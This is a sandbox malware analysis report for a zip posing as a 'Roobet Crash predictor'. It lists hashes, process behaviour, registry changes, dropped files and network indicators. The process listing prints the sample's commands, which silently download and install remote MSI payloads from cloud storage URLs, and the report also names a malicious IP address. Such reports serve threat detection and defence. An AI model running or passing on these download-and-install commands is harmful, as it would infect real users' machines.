File name:

Roobet-Crash-predictor-main.zip

Full analysis: https://app.any.run/tasks/bd785bc5-02c0-4b8e-9898-495ec459c8b1
Verdict: Malicious activity
Analysis date: November 15, 2020, 23:31:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract
MD5:

A8834A62B447466685C2412B0DBB42EF

SHA1:

79465BD7E88E09205C346F4DBD2C931C7DB30931

SHA256:

EF6CBE3F27E22615FB63E0007860A2EE5CF0BC486B6A0CE2B9346B9945CC8F79

SSDEEP:

393216:QGv+x7b8V7tXVCYBTR2x0nkH/6H+9lI4pCfgp:y8ZtXddR2x0nM6HstCIp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Predictor Launcher.exe (PID: 1464)
      • Predictor Launcher.exe (PID: 252)
      • diko.exe (PID: 404)
    • Uses Microsoft Installer as loader

      • Predictor Launcher.exe (PID: 252)
    • Changes the autorun value in the registry

      • diko.exe (PID: 404)
    • Changes settings of System certificates

      • msiexec.exe (PID: 3348)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3348)
      • expand.exe (PID: 2672)
      • WinRAR.exe (PID: 2912)
      • diko.exe (PID: 404)
    • Application launched itself

      • WinRAR.exe (PID: 2272)
    • Reads Internet Cache Settings

      • msiexec.exe (PID: 3348)
    • Creates files in the Windows directory

      • expand.exe (PID: 2672)
    • Adds / modifies Windows certificates

      • msiexec.exe (PID: 3348)
    • Starts CMD.EXE for commands execution

      • Predictor Launcher.exe (PID: 252)
  • INFO

    • Application launched itself

      • msiexec.exe (PID: 3348)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 10
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2020:11:01 18:08:09
ZipCRC: 0x00000000
ZipCompressedSize: -
ZipUncompressedSize: -
ZipFileName: Roobet-Crash-predictor-main/
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
13
Malicious processes
3
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe no specs winrar.exe predictor launcher.exe no specs predictor launcher.exe wmic.exe no specs wmic.exe no specs msiexec.exe no specs msiexec.exe msiexec.exe no specs expand.exe diko.exe cmd.exe no specs msiexec.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
252"C:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\Predictor Launcher.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\Predictor Launcher.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa2912.46621\predictors launcher\predictor launcher.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
404"C:\Users\admin\AppData\Local\Temp\MW-3ad1ba43-82af-42a5-9d30-d1d38cefff2e\files\diko.exe" C:\Users\admin\AppData\Local\Temp\MW-3ad1ba43-82af-42a5-9d30-d1d38cefff2e\files\diko.exe
MsiExec.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\mw-3ad1ba43-82af-42a5-9d30-d1d38cefff2e\files\diko.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\user32.dll
1392"C:\Windows\System32\msiexec.exe" /i https://sasosa.s3.amazonaws.com/EY3ZTKXKWRXB93ODV94761XD34RU0NUH.msi /qnC:\Windows\System32\msiexec.exePredictor Launcher.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1464"C:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\Predictor Launcher.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\Predictor Launcher.exeWinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa2912.46621\predictors launcher\predictor launcher.exe
c:\systemroot\system32\ntdll.dll
2184"C:\Windows\System32\msiexec.exe" /i https://plugsa.s3.eu-west-2.amazonaws.com/reza.msi /qnC:\Windows\System32\msiexec.exePredictor Launcher.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2272"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Roobet-Crash-predictor-main.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2672"C:\Windows\System32\expand.exe" -R files.cab -F:* filesC:\Windows\System32\expand.exe
MsiExec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
LZ Expansion Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\expand.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\cabinet.dll
2912"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2272.44449\Predictors Launcher.zip"C:\Program Files\WinRAR\WinRAR.exe
WinRAR.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3348C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3408"C:\Windows\System32\cmd.exe" taskkill / IM msiexec.exeC:\Windows\System32\cmd.exePredictor Launcher.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\systemroot\system32\ntdll.dll
c:\windows\system32\cmd.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
1 733
Read events
1 658
Write events
75
Delete events
0

Modification events

(PID) Process:(2272) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2272) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2272) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\13B\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2272) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Roobet-Crash-predictor-main.zip
(PID) Process:(2272) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2272) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2272) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2272) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2912) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2912) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
Executable files
11
Suspicious files
2
Text files
90
Unknown types
0

Dropped files

PID
Process
Filename
Type
2272WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa2272.44449\Predictors Launcher.zipcompressed
MD5:
SHA256:
2912WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\include\bytes_methods.htext
MD5:D63054D05B04611AF3FE09695AA1A92C
SHA256:2DBFB55B484545B94247D1CE65702F1460ADC970EDCD0DD4A86B2957902728FB
2912WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\include\code.htext
MD5:88EAD33E0041F48BF668C8F0BE198066
SHA256:17E23DC9CEC23F7EAC8839EAD6F0D276D4697A3659B3560D9BE28B3B58C7A15C
2912WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\include\cellobject.htext
MD5:BAA321AEBD7EF2A8D505C75B76F50BEC
SHA256:A277081668BC14F99518B3B7FBC8C8E1B98CC89BD3D1E6AB02D864ECE1209A9C
2912WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\Data\Sounds.dllexecutable
MD5:1F8DB83C98BC6528589B061BD7055472
SHA256:93D519B30A7D388FA983B14C94119088C3C3EA91512FE42D104E5343AA0F38E8
2912WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\include\boolobject.htext
MD5:DCC48FC557F8337D7BAA90E13D34B36A
SHA256:9483A995582F2DDAD6B47F85BB300371346CA10E846B923170D39E523815134F
2912WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\include\bytesobject.htext
MD5:EE293911E2B74B3AAF1F8599FB88FFB8
SHA256:1582D6984B4FD2ED407CBD50B3AD97B79FA95451D39333F1D6966FAC40262974
2912WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\include\bytearrayobject.htext
MD5:0310F1528CA7A9966680F95117EA487E
SHA256:400E6E276FC3FA823F29629FECFF302BD08D1ABB896FB500C4FAA334AA3293FD
2912WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\include\classobject.htext
MD5:9F318B9C5346A94372C3E37C0BAF8421
SHA256:DF989BBB7B1A425821BC68E1ECA9CD745C12932AA02EFCC83D700B47F013D04E
2912WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2912.46621\Predictors Launcher\include\ceval.htext
MD5:AC76D8E98C4419356787EF0F0A70955C
SHA256:A50DDF6E874CFD1FD226080BF31E4636A2F5FAD806A4116CBD68EDB612932515
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.244.128.7:9946
malicious
3348
msiexec.exe
52.217.93.52:443
sasosa.s3.amazonaws.com
Amazon.com, Inc.
US
unknown

DNS requests

Domain
IP
Reputation
sasosa.s3.amazonaws.com
  • 52.217.93.52
shared

Threats

No threats detected
No debug info